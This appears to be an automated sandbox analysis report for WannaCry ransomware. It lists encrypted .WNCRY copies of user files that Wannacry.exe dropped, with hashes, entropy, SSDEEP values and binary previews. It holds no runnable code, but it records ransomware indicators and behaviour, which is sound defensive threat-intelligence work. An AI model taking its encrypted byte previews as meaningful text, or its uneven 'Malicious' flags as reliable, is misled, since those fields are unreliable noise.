SHA-256:	39CAAA3F3777CD392A94BE0A7A24175E2CFF1A487420ADA0242C7B2DE52D7C9B
SHA-512:	B08D5E2FAC013646D06B0CF9A2645F4F912E21899E8AF0A896AF7BD507DBADF372A43521D29185C651C66F4CE25700E18AB25AE63F9F02F013A4B285D1B60E27
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....k..XL..MQ.#~D.....!&...l..O.x....L...12.....!X..r.:.g...B.O.\|.'.7}+r...dlN...V..Y./...[.....!V..w&....@.>u..o.....D...,.%...d..q.;4.....o.)I...q.Q.p.B...%.?!........D...5/.....L......=.7.i<.....p.?T..B.'....2...p.@.(.E'..h....L1_.ay..R5.............n;O../...83......q!vE......,....B..x.^....L.p.f.'.J._C.h..m.?.w[.ta.%Y...l.d...U..r..o.0.....q#D%.b.'B.qo... o..lOVDI.>...~W..9.F5..>....t.Y..]....Y..#.!.0o..8...%J...fL^t.&Y.t...e...Y.1.".\|.......c.b-.Ie_...cE..dD.&..B.N..@L....7{.r~MG'.qSK.n.G.l[.v..5%xe....I5.%... .O=O............+......./.03.g.;.?..B....}..N0~..a...f#:.:If.Ai.'..xf.J..e.....2...Zs(N%...........+..7...".#O";.W.0 ...N.V...X..7.....2.E.).[.-.B%\..t.......g.hn=H...-....n..........M.......m.m.....V..........t~.ND..R6R...k.D.Ab..8q.v.X..........'.......Y.f.yh......C.A#......L.}...+..R nV.-.Hl..".{\|._..b.....V..U~.V."......\....**.0....n....5.s]t.&....-.......M..(.../...G....?.ro1l..[.@.....b....{

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	128936
Entropy (8bit):	7.9983937581588345
Encrypted:	true
SSDEEP:	3072:q1Kyg5UbodejZKRH6oOEQsS8/DnjHJP2w8gRq9wr9L3gM:qIygTcoRHstsSKvJPcgRq9aL3gM
MD5:	0F4CB6C7E1D0CDFF79735773C847FA0E
SHA1:	870B088F460905D171F48E8413FEDCC9A5F3831F
SHA-256:	6AAE65D48E35F2EA1F854F2DB685BAE822079D8A6B7A442BA1C95449E7AFB6DA
SHA-512:	DDA208599DD5FFBD956A134F81391C046681ED43EF63ECDAD1138D3F2ABBDFA78453FEE94E3D0C4A131E61CF39DC996ABC5CE4CC5A9D1163C88BDFEC86EE3944
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....eF.:N......9#.%.!...Z _.R..eUUp..<..u.Y.r..:....S..w2%K,.......K...Z.\|.3..T$..p.7.R).R.8`.....6.... U..d..}..q.....IC.)AD\.hov.`i".ev\|9#..%..m.i...2?L.6..g2A0.]\.%..R0q..i....x.\|......{v..t.....9...7........b.........$m..^....n.f{T4..<.%..'.l............7......sD.7..x8/...4......[...sC/[).....0..?bG....9."?.........-.s..j.... ^..~..Mo.UM......V.s..F........?x/c.:0..B..5.>.U.#X.\|~N........Q?t....\|.9....v..2. ..oU....S.AV.>.5...kO./>...1p....g.......G..f........\|+...n.....y...B...X8J=J.@..wp...`.b.......GN]Y&..L.f.=..{t...z....m{r.....c...3Q64.X.b-..{.u....eb-...I...4O..7.z..vE..NA...]u...Dq........v<B..:.N..G^..qwII..\|7I.t.P....,..y......4.,.`-...5...Ok..........G.?u<..\|.vf.s.S..B.G....^..lW...e..~fa.jL....z/.z...D.a...F0....6.V.J.#(...CbD........p{..P..j..C$%..6c.../.0S\....@...H..b..0T..qL6..Ec...X0 .+.Rk....K...*.3.TO.==...fW...}.p~.^.3n...!3=T.\|O\|..E..s..r......jM.....C%c.E..."...b..1.....!............i.C..G.9.HS.....kv

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	221672
Entropy (8bit):	7.999149022415201
Encrypted:	true
SSDEEP:	6144:TjklNnT9XVdAIgKqCZ4LgAX/DsliCO9gaT1LAB:0TnTvdArRU4/AZGS
MD5:	7A630C21325D1BED5A3CCE9C316EB7E6
SHA1:	6030A9BB83DA9D5C0F6FEEA1F79420244E4A2F27
SHA-256:	ABE7060755CC4B390A2167065B69F4F056A7CB3A29935F50B894D3B2B9EFB59E
SHA-512:	36B148D687C0FED5E606C2B0830462B480BD084E726F9E12519F3B10133CA7B83E9E54145CD95C16B53F94BCB623A937E220BEC57F1D3235A18EE6DD0D535625
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!..........5I6.H.\.........0vG,.r...!/#F...@7.D.)...B..&....'MQLw..?..l.{..F.....Y.Y.5n.p}.... xw..u......X.3Rh..ez...H.;j...Ri..R..!.l......+.b.C..........\3..[.g.%k...`.).x.Sf....;.c.N...V...@........b..z...}._[.........]}.)Y...l.->.....q>.z....t......`......8..c...G..2..;.)..z)1.v..'.>.bRA.0.\Y=...y2t<.r..<[.&.H[#O6F.<..J#.H.dV.f.x.o...s..._.....f.T.......h.lB.._....pt.....J..vPg.9w!P..}..4......l.A>........;.gU...E. ......?$..6.)_.1..&.zIW&;.V.{..8..;T=...T...J.C4.....,p`;.].h..r.h..;..wp.B<ebV.yT..NWF.O......I..h...R....2.....$...J..fg.:....Vi....Ph....po..A.?y-.J<...xg...L. .m86.{...v.C~..&.Y.O..2u...b.u....d..o...N<'.-.z.`TKdM.(Y..v......T...qI..DM..nv...]\|J....`. .r....Ky....5p..dsl=..g >../.(.c.E.7Vd..DM......fG...@.\|R..F.9.\..z4.D@...ZE.a.......".....e.#..F4.A..[....S.....:\|.d..-..E#.[.T.a...Dp..=...&..rT....U'..rY^.......oc.q.1...z.......}. A..i.....C,.9 ..XgQ9j...<&.).7.A.8..5R.w...hq..4....fS..@....T.01.%R.nB.v.j

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	214008
Entropy (8bit):	7.999102878094797
Encrypted:	true
SSDEEP:	3072:LPuKVVuWHmgO00F0XJM4gleB/ZSVumMLI3cHezdqY5041qZBAbK4FECC8PJuHD3z:dVuYjFXWSXrmV3qeZqY50uqWK4F+/Hrz
MD5:	08DD58E801048127F80B6A85823C3F1C
SHA1:	F2966CCE9478EB0B42324B501E2A611B8FA86F73
SHA-256:	FD8EDC7D985662AD5A720E9F69516E630A5D504DA7A2DAD9835CC314C3974DE0
SHA-512:	76799E86F65065ACC67CEA025E04362B2C2377A095A44FDAA16EDCC5F51E002C3126F795476E20E5DBBE5EC6D225164F1F1D767B1CDBF0E0166EF3862F26821C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....&....M.H.T~.`..5NF.}s_....`..I.N\n..v.j?..N....q.a@>{C./..4.TV.[...K.m=..B...u.z.?l..Q.1.<Ay.B0..M.....wokoV...B._..Y....!...2L..{kUw..Yk&$...}.;....A.J.&..B[WR\|...y...X./..2..:.`...C...L.R.Ad.(xw.e.<A`.)V...g..E..).N..Q.k.wDM.........sb.."!.>.....B......M.{....)..w..\.~.j..r:.t.3.m5.O.P..u.e....;.o..l.-.......i...H....u...35..@..D...%........t.f..m...G..(..C\Q.s?.z.:.f"_:.@...#.S.n.3...4.:...`".N...-.P....qd:.....)..f..:..#V.....f...8-.T\5.......Y;fF...p..g.).X\|#.K.P.3.....A.{.:jL..T...Lq.1v......8.....-.t....B/..%.i..FIL...U.....CV6.LU..."p.Yw4$4q./.8.`.z.w.9.nq.1\|`.p..}..]~... J..4....`.&.(6.rM~....<.......VOF.....c ..;6.X.j ...1.xM..BM..h.}.O..:.Z...wW.&.GU...A..#.....=[.Ll.Y....*.ii^..${.j.).I{.mG..PUp..Uvf....q...a...Fj.5.L.PC/Kb.f~..V..Q.\D.0].C.....q..).i&.H[.....F..R..........i.G..a..v..i`.!...+..z.)T.mo...9!...f...3#..q%....2.......da.......?.O{W...$...-'...H....t$.(...(.].@...{pNI.....\}D_:mW<.g..cV..V:.H......

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47576
Entropy (8bit):	7.996108040172503
Encrypted:	true
SSDEEP:	768:x06LIeeovXMdv0ragKstUJv1xv1JeO3DAFoYeEe3RiVMLfGQMMVz8C:j1XMdv0eCtUJv1xr3DHYBeIV8fzMyT
MD5:	E3414B5B32AFB14B0018D3604204FAE1
SHA1:	F6ECCF0976AAC45017B092E3F1F73BD7B83F0C0B
SHA-256:	FE7C22CE0793AFD0EA963C0034474421B5CC6E7CB5B21A3DB7051F261272599E
SHA-512:	24FEDA02C69DCBCE70D480CCACC14E890A1D026164A899004C9AE60AE93D4180A1D3D59C86C3EDCF994D4D286FFD216571338864F637662AB4D568DE83D407BA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......z'..8..m:.....<t.A...z.Z'.....wp .M..._Cxv..p...E..WB......QU.}.:nU..F:D..f.sA.?m...{.k....QL...$s&..i.......=.}..bIp.[.,..t........F..\.-^.0wMHASbjl.".."....,.(..,D.....<..Z...c.....g.PjA..@5...5.........?.3.Pg.'B(.#.^..%.....b9H%..8...Q.~.E.(.............k..L........k3...~.?..\|&V....p....KW...(J..M...MYTA...j@....5....g..1..w..S~3Av.v..A.;m...`..<..}.v$.5......0w....B.v...^Xo:.....b!.7a>]..Uh^b.`...>/.v.J......[....<k.-VF.......P.z...<...k...?.pV.T....tW.M.6Vb....x...jD..L..^...V;...G..^N.l3.5..[.........5..I..........y......l.%V..we..L...O.~../..+.XP...}2.7.....s'V.{@ ..mc.....E.j....(..l.U.Q..vt=Q.$....@..G.C`L-...<...[i. ..t....;....x..^...O.cv...<.Vo.#>..(\.B.........m,n<%.=.'..L.....l.7u.....Wr...}.....L&g.....d...i..A.^f_gB X..?N.qT.y~_.D".cY............T..a...d}H4.....X....%.X.@.3....\|K=...ao"..g..#.m...#J.....1.r.D!......v.Q1E.5....5i...f......!{...<.....c.."L......1..$.7....O-`....a.=..B..G.....-.Ff..~B....X..\.*.6v+

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.857818170607631
Encrypted:	false
SSDEEP:	24:bkq6Incc+WpfCee5YWS5z31Bl8fK64WnTSAZMXJcs9lIsx2gSSf4JAWA:bk5c+WpfCiNFBlJWGAZIx9K+SA
MD5:	9B0D3BE1261C84BBC737B00D5DE509B5
SHA1:	08A1A09B5E852D4AE4D473AB6FAD29AB04C8DF50
SHA-256:	89CB9D307D3D3B933ADFE976850D807177C4485B8C7C739567EEFB4F7EB8FA72
SHA-512:	1CC8D49414EF4AC0FE2E08E246455E24A0E8040378F5996CA60196097575FAFB2C08E6F7EB5F8A4172446D984FE771817FCAE70CD4E827111B0414D6AD6EFC27
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........A... .v`..ab+.R-q...Ro...t..)z.%+....3.V......j.~P;9...c.AI..(..N}Il9B...<.7 ..>@....J.....@...2..v"O...1...X.C.xw.c..$..>.o...o.O....9.JI.)...2Z..s%-...8i[d.....6..o..C..;..UM......3.._E.#wCI.A.d5[.rGjT_...<.X.......Ls...:..U.......>.k:6............^`"..\.y.%]!.:..@.\......K.C;....\M.hq..9....:N7.k(6.u.We...h..fH'..O......u..C...e....m<....1".'U..GQ..A...@"....I++(..4..w.... 5%....#.3...5OX.E<..F....a.....v!i^.,=..&.C........../K]:.BC4P..t.!...a.....eH5.!Z..<..C....;..mb...T.........b9q.f.8.5V.1j.....U8^d...F.!Wp%.4.^.VSc..N\...-7x.C.Q....T..e.P0.././..5..Y..dPS.-.AQD9.v.o..F.[.gq/q....T......h.U..^..+x.YN?W...<...K;.z.7hG;+?b..I..?...z}.,3BA(k..<....@#CLt(.tg.S$....EU1`....j.4....>T.e..}.../^bx..S..*..Bw...#BeG\|6.....u..q(.Y.....oN..g...C...&..t.D.....,.Q..........._."....XV...[...f:.F\>.3G..N.y......8?.......Y..kH..AL....w.Z.^Fa.....Iz.i6.y...7......\..xb#>..S)J..3z...j..B.p...U..I...$.[}...4.w...?.g....g.+..J}..Wu.d..g._..

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\COUBMCBZDK.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.854758643866394
Encrypted:	false
SSDEEP:	24:bkK1pfxNF9syXKztbuc4+bEfTyHyMBMj39M4m1cOu9ogpbT0OP6foqbtG:bkexNF9Y4cREfTyfyBRGtu9ogl0OPU0
MD5:	6257E667BE4AE1B752594F8EF01DDBEE
SHA1:	6BB35AFC8F1FC788DE5A47CEDA354AFE6D8B01D6
SHA-256:	7E0B7A9AC3A108921033392814929F571A08FEAD399129D0CF4A716B25619D21
SHA-512:	7B86730697FB1672690BCCD3580823A4F7A3D64BD7B5460B62E085BEBDF57EF4416E196BCFC5EA743525E19AF2527610D8D9275682A777F87457DD20CD858F45
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......W..DOez..)..R..&@.tL:~....I...l.E.}.b5..E.. ..}.....!..H.H.....kf.~Y3...\x`....S.H.Q....vY<5.p.....2&%.z .........,P.(..9f.k...V.....~......'.9.m+........a......n..i.$.LFl..'....Y.[^.....gc...M.._wyu..y..3.o..T..._/.L..T...Y._.pQ9.`..............Q6..........E.L.H....!...q.....qFU1l+....=...U.M.dQs.0..r......B.......B>[_.A<..8[.k.:..8.[N.5.Th......NF. .@@.+.....U..1'u..v .~.... 1.....G....d....;T.~B .=/;..#"._-#0=NE..OL._..]..3.O5J.<....VFtCy..'3.?.........{..4.6.IX.......G=a....n...G..f.%..Q..1.O.9.43..C.8.~.-.=.p.N.0'...]`].\|....'D.i\yf./,..p....3.s..e~@....'`..t........@...y..^.y.J.Q.q..}y....{~,..w.}......l.(8.]..[..... ...gtE}..l/....a/..u_Ui..^']0"..Qo..q.s!....7.... .'..n...o.......k...w.I.a....x.C9@...C.L.2...." yq,.......+........EoNK.$.(.{....z.y.R}.iq&i.d.j....,..$....b......g.G."ft...x..........CK...vX.&i.h..D..h[z..\|/w..1..;U.~....3.fit4.D.........E.SA.......*.:}......6k!..Z........Y\%.,....4..I......u

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.850502554040945
Encrypted:	false
SSDEEP:	24:bkJ2dZ3aq5Wd8W9dBSU9asGrqqillcj35OKHb3iWrVAOX7uh1aUtSk0bVJa:bkJ2dZX5i9dlNEDLZA8ujana
MD5:	76F2E8E837C2FC31F9DE782188EC9EDA
SHA1:	B2F4672A96CF9FCA75D42C27106A0E4EAF61A5EF
SHA-256:	27D509FA1702834616057098CA91408AD6C7BB431EC409D71333ACFD43BFD71A
SHA-512:	E42E3964DDE31B58F8F6AE5FC0E76E1CFFB8911CF84CBDE18D3CF26A675F0AD480C42C452912E8320A44130DE6A88AE56FE4A3F46AF567AA4499E6B868E83D67
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....D._]..3...p....'R[.5x....l..'.......S......z......J.........NUX..j_..'v...O..r.`..#..R,b"8..L...Y9..Mo.s,@..[.X.RZ@vH..z...=...F.....`t.i5..'1./...CBPx.!.j.p...`....7P.....\...[..M.v...9..@=$7..JL.<G...&..... G...[%.9..:..}c.0....b......`..q^<..............}R...r~.vL1.e$..t..hh.0d....6.'...Jy......f.........%..L..k.E..3BR.....03._2.._.T+...\...F.q.m...o.i..N.'.....-.......!E ..Y.0V....k*@...Q.7..`.MB.8.n`..RK.").S[..1...q=+._.m..E.....9Mm...1.I..Pg.....o;.=..W.>......X.+...]e.wx..Ip&.`....I.p>..3O... ...t.l.DK..('y...zx.....^.u.V$e.K.?..J.Y....%....A..'..w........K.3..R......F<.E7.f...P....c.........n.W.....(....:I......L..'{.~..].w........?.......M...M.J..V.H.9FI=........[.....@-.H..J.^.{...r..me.....XRm....@..G..X.U..U....G.".:V..:..9b.U.Qlw)...\U#....^.#....M.o~)&......(.K3.l...O.c..^.c..Y5.]../z.[.T...yL?....~y.b.].\|.^G.r..".7.H......z.D.q.HS.U.C..l.......&.r7+.~.&l.x.2u..vc.D...$6.W^b.@..R2=..H..[...."..B...i.y.$.

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.835809445332513
Encrypted:	false
SSDEEP:	24:bkDSdGLnm4u5qvAQ7M4nwIE2A1j+HYp8SN8OlkmV1e/8hsUTNxBzoJ28kT/nno7W:bk6FDTQ7M4nwIEd1K108OmmNsuzo1kTD
MD5:	5A1FB13337026BA71804FC839588FB93
SHA1:	CB3C9C78799D27AC906A65C36EA4B1A76FCB5D0D
SHA-256:	6F04FA7CE770ACD4EDF6C73A98A34CC15B0419FB1DA7EBA5B20C7B51E8F09EB8
SHA-512:	F1DEFD48068279B08BB75624B665D0FB03063E2C6A028754D57ACC213A6AC2AC2D7AE91E0F7D1B3AED0404D07DD0B8FCE3436B6CA1E7D4DF8696C7714D27DD2E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Xx=...\$w.2y.Z....m.v...'c...M ......l.9I..."u...@I.l.2`....1.f..j....."O.7$...}0.....g^.3...&...ch..3.)...n.FK...q....t.....+..>.S.B...dN.z#....f..p...,...fm&.r.P.....n.Y...qx...`...X:.....5.....@........G..71.. ..s_2S......j).."P.0.................c..O....R.F.L....'..Y..l..F...3Q.o..1....1.G....%......!w..x[y..}..2..)ql......W.~.......K.{'q....x...>.J...\|...A.!.9.....CPv..(.w.:.....!....!..5..Ac..d"\|..n.s..-Q...S...6.N...{..$.........'...(.q.{....}.,..Z.YT......?..........=.....5/..c.Of...QE.`#^. .q...rb.n?.#..9..X>..@zA`....<.."...6R./7.<%Z.k'=..t.......... .T:.......+,.S...M.d.~..)..j...N%J...+.\|C_+....J8.Hx....o6.R..c..w....=O.kw.......w...ih.ap[a.......r.z..%O.+..-..C._.o......yX..k....... .......w.c.o..]..d..2.Sw....^].6...7....t...F/.58w.U8@bK..........f.,......K&.Kl....A...'dA..f...j.<.P`,....K.4...s...3 ..i.S..)1F...c...7.HA......@....j ^...1....r.0m$..A...D&...9.....!.4D.R..J..#...s.Ms..2;..C.

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8701125261509794
Encrypted:	false
SSDEEP:	24:bkWfxwHK4qebCJxA3IxXERXHmSD/qjzIr608OWzpBV6H5szK18B7ZrAQDyV38:bkWfxwOVxA3zRXHmSD/yOv8OQVyn8B73
MD5:	2A14BF41F4C675C6E317B5C0A1221554
SHA1:	976AD91E04585CE874A1C8044EEA9CD1D1CAAFA3
SHA-256:	5B0D9A8726B6D14DFD85C66FCEC5241CAF715BFE9C42FB009CD7AE82FBFB785D
SHA-512:	88B73C6E8B14C1FE773A0139238A6FF09ACED3674C074476DBDDE71CD80F84D8E43BDF64067CEAEACC5DC92678C4B5D5873C3695DC2047CC194291933CFBEA46
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......F&(....b...lhN1..H".7....s.Jj....S...iIfM.yM.:x...9....bU.... ..?.............Y.&Q {.wt0.iS....<Wu...oT...d.C.`....ds.-.YJ1Z@.......<......d.....:8-......gx.9...cnD..LO..'.....p`K.c..=w..`.t.R.h..~....H....E9^..5.?.).0..!.1......."W.W...............'..g.)...{\|.52\S5>}8g,.s.d....'S.....G>3m3.e..>..}..<.o..u....7...........".Mk.....l...@AKKm_..FI.y.cSXz6...4....a..)(...=......".p.c... F;ze.AJ...<.\.....8..sft..+.C..sd..Z.2..sY.m.....8.....8....O.....:.j"..H.-....hn.M.I6..I.L..t......-F$.M..\ 0.I..Qk.R...k.Y.i .3..c.G..@.........o..%._.yY....u])....).u.(c.h...{)>q...H2.d.K.........6.......P....?~@......\|..~.I..N.o.@.....S".G..^)h....^(..4./..t.M.G.D...\.]...R<~6..}...?..."N:....F;z..S..a,`.&.'..ug....8M.;.u...wi#..$.d.jE....y..!.6...........?C.H...i..........'.%.S....a.....C.......q.r.)..k/.[..".&.U9`..x..:.7.F..+;.D..j..#...I.m..h~.".....5.q\d..,!....z...@...._.......C.....k....U..Qf...........zU....*.<..0.6!x[..}....

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851128962466472
Encrypted:	false
SSDEEP:	24:bkOl9qgVPhi1VZK7qXPk+TvwbQJsUKQZvnNRg4lyYDEAp7YLDbAYZRA6Gre:bkOl9BQzc+TvEHUxhNR/yYYAVYjVZrGC
MD5:	432BD1C0EA15856B573BD51F3BA36045
SHA1:	6106DBBED68DF54ADC1337ED449A7A74A42CDE86
SHA-256:	E0E59EB9D84CB5553715FB1CF4A4278222554CEB7DF4553F203C154915F30820
SHA-512:	BF42A367607B69E28ED866F5EDB7CA4387AC5DDD5FBC36134B4478A9F13217DB4B70A686C49F90ABC83F3B57D459E88D220E7EEB7973179ACA68B73A6EE3EA1F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....;D..@.$.n...L....r..#!..Pl..-.T....=...........FaG.x.....M...k....C..A..M.B..,/$C.J....ag...F..%.O.....1.?w.3.;...Z..)l......".i......!.Je...X#ygl.6]H.I.%M\.!..+..B....@$...f.gc..\|V..y.....\J......3.........l....../QQ.SR.....a.X...j.<.+N<L..~.$...............-.f.au....x7s\!.9...Aa+H...A.3........Vt.;f5.....4hGno(.,.v..D..W..+...nw...&....Q...&..[W.`..61.z.gN:..k3m......}t..d&0.s..R....L.}9h.A...2.?4}.{a7.2U!.....i..........?<.o...+..Z..(/23e.sH....5.$.MH.S....i..3.. &c#.......'...J.......#...3..Y...]!=..5....7hv.vH.;rx`..Ni...J.../..gCxT...='...p.....F>.N..>..(&y..B.....>'..o.N.C...\.5....=.....H..c.H...j+":Q................{.HJo....'D_.<..(.....Y>L..Y,,h.\h.....k..."1[.......,f.g..E..Q.8.6...-w..%.r.Y...\..F..8HdR.qT..o]...n.H...[.Q"..>.l_..F....!..[...9`p..R...z.......7?<...6%[.cq.......&W....w. go....^.F.]W#.H..t..#&.e.:.@...v&d..OV........e3.l..H.._.....v.[O.....d........kh._4...)...q.w.u<.>.._h,\|D-.Wfr.....Q.........ddP.

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\LCMFMMJDAC.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.813942184251048
Encrypted:	false
SSDEEP:	24:bkChWo1vStFsAcEbHhs6Lws0WvnETNQ2A5s6oirFocIe+aCMtBcHW8sByNfI/Y82:bkCF1Lmh5RtE6v5nIeTtChsBy1Iy
MD5:	F2F7246A6BB20590339B22B4BA2B1B5D
SHA1:	90DB86ACF02F8EEDF0291559D25511059C2BF19D
SHA-256:	DE54641CB2DBFD331B629B1C488904FC1EE94186D2F6479E9103CD282FF7C9B7
SHA-512:	EE2D41D263288CB23EBCB24705C8E52B7C8E63BCB607F104C07CA1490FDA13FD2B8098D86968FB092C55B776D25502672841242F71406D1F14FD1E34AA1459DA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....o.oJ.a1.c,.....IO{..<.K`.p.1.....J..PZ....S.l.v.5..wH.....{.].Elv.p..4wP.x............;;......"..LW.....!.}u.S.~..(...(...<.\|.b........VZ.K...o.A....^.O...(....n.."..._.)g..J.H...~6.......Hx...... ......J.4w6/.a"..C9...P.....s..^....N.............x...3........H%...'/6..........>o..,?j/.n...%..C..!...x0.v..fq...G......QP.....\|.E..../A..y~....!.M!>W.E.h.J.j....c...!:@.~s...w.K.5..g.....].._.K.r.G.."...T.h.F....p...Wp.h....~.".nF.Fz..7ydO#.;...>.X......Qz .(H\ ....u..x...2_x\|...L.U..1>.JND.'+.E.E..f&a6.\.R.......gRu.....Q....yGfoI\|j.D.W^bt...>..^n.l.....JJZ..a..}..`....%....g.KH....a+.a...c;w...G.~W.."..Xy.r.....XRu............)...=..Q....Jb."..k....q.>..uX:..CY....1#z+I.b."....}..b..:.)..+..{.:9.G.w.w.}.Q.V..E.#u.%z=..r....\|.M.3M ...N._....../9...x..a.J..k?.....(;....n...N......`...$ ....)........K.K?.....DHY.o_.u...#.+.9..!Q.2.i5....$..a......:$.......).Qc.+..._....n.I..F...]tQ/Q...S..wf]T...Q....W...D..]..22..0v{...,.;..!.`.

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\NWCXBPIUYI.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84238380361571
Encrypted:	false
SSDEEP:	24:bkXWc9qdNEYRtn1yp0/39gJAJCFDU4ID2OCqYpDrYBc7KewmjgoxH1ZPWv:bkGxdNxRtnntxB4ID25Nrsc7rHCv
MD5:	A9C1ACFDD607645241E9B7B0CC0ECCC5
SHA1:	46EC24968B70729925BB04C805E3D4B1FB3790E4
SHA-256:	0FC1256EE9DDAB570383941B736D9D16D9E3CE6556D7F8B668E9A1DF4E36B34C
SHA-512:	7CC6A01B88F638FB4A9340EF875ED7F3C3A3497F605A7C644342021B5553FC9D647983F68086AA3DC83E1DB83D5310EAFD9D1510A5E61E506D43BE6C348B7BB5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......}...(.Bvc..%.M...`..F....E..?HV.;.............H....v...XVQ..6....~....rxQ-/pB..C.,J.z..'...6"..........+..\|.ek....-.i.._.k......=.I`<.....b;G<...y..6.kQ.....lTW.,.N8.k.(4...=D...M..v..;._D...}.RH.W{)1.~..huE%..J....^.....[T..b@?...n_/..................Z{......]B......A....o...t.&...p'...BY....]G:3......L...=.d..P......%u.;.s.....>q.....0W9....q..L.Yp..\,...n...XKj~.........Q....wpP...P$Z.w..2..._.F.........%......f...c.Dv..q0.;Ldg.....x..2aX^..\R#.&s.}...GA.....>.3..B.$.....;../.....o..8..=`..7.).B..+.mN.gc.P.{u....A....v....6._4.2..c..ZxOH...-.V6K...k..R.n$..U>b.....A.-.N...T.w....X.c>o.......j..r..6."....w>...U...F.....f"7#.+K........".fJ..v...,D ..).-...e.M~3,.....<..4S.^b.z[{x.?.<...w..nn...ob....%_?..= (R@U.t%E{].....Eu...d.N!O.;..mr..0...W.........5.~.).c.....E(d=.e...d.V:.;.....,....^.xQ..W.}.:..\|...sh"..]....L...VU..~~..z..l..'.y...U...i.=%Z.....v2_..A..da....Ky`...u..Qc..\o~.q..".T...$..\..o20E[..>=.e%[..

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\OVWVVIANZH.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847112958001948
Encrypted:	false
SSDEEP:	24:bk3JXsykaEkRDzYFlNkcbrr3hEg79pRtKujzqoi78VJ2ba5pc2QID:bkiazmjNd/df79pRtKuPqoiIiWncnID
MD5:	F820565297D97D24E87D29D3BC6E6240
SHA1:	52E12A7D95158460849181F027A44F6550E571D0
SHA-256:	1B0976503E8EDBD0652DB15D96E9884B2767E4758842044BBA1CC09C598F0E1F
SHA-512:	BAAABEA8F7CD654BCF450108126C5C1429896B6D089319D15218E757626C814E585DA0F1A27E99AFD1F3EF286D9D156E9E4CFFCC71146D457508E20702FA1743
Malicious:	false
Reputation:	unknown
